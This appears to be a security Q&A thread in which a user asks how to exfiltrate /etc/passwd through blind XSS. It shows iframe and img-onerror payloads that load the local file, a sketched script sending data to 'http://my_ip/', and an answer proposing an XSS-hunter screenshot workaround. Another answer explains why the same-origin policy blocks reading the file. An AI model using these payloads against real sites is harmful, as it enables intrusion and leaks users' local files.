3

When I do one of these payloads, I can see /etc/passwd:

<iframe src=file:///etc/passwd></iframe>
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>

However this I got blind XSS, so I need to send the iframe text back to me, so I need to grub the iframe text and do something like <script>document.location.href = 'http://my_ip/' + iframe_text

How can I get the iframe text?

Peter Mortensen
  • 877
  • 5
  • 10
eyal
  • 73
  • 1
  • 3
  • 4
    You cant read local files via blind xss – yeah_well Dec 30 '20 at 06:20
  • 1
    i did i read localfiles with blind xss... see this code `` – eyal Dec 30 '20 at 06:22
  • 2
    We need more context. Where (to what system) are you injecting this, and who loads/displays the html in their browser? – Bergi Dec 30 '20 at 16:27
  • 2
    @eyal That didn't read the file. It loaded the file into an iframe, which is in a different security origin to the rest of the page. The browser's same origin policy (SOP) prevents scripts on the page from reading the iframe contents. – Polynomial Dec 31 '20 at 00:31

2 Answers2

15
<iframe src=file:///etc/passwd></iframe>

This displays a local file in the browser inside a separate iframe. This iframe has a different origin than the main frame. Due to same origin policy it is not possible to read the iframe content from the main frame, no matter if XSS or not.

Steffen Ullrich
  • 184,332
  • 29
  • 363
  • 424
-1

If you are sure about the Blind XSS, you have no way to retrieve the content of /etc/passwd to your server, but you do have trice to see the result.

You just need to inject a Blind XSS payload from your XSS hunter after injecting:

'<iframe src=file:///etc/passwd></iframe><YOUR BXSS PAYLOAD HERE>'

This will cause to execute the payload after the iframe injection and then you will be able to see the iframe content at the XSS hunter. Screenshot that you'll get back in your account.

galoget
  • 1,414
  • 1
  • 9
  • 15
Just a Bug hunter
  • 1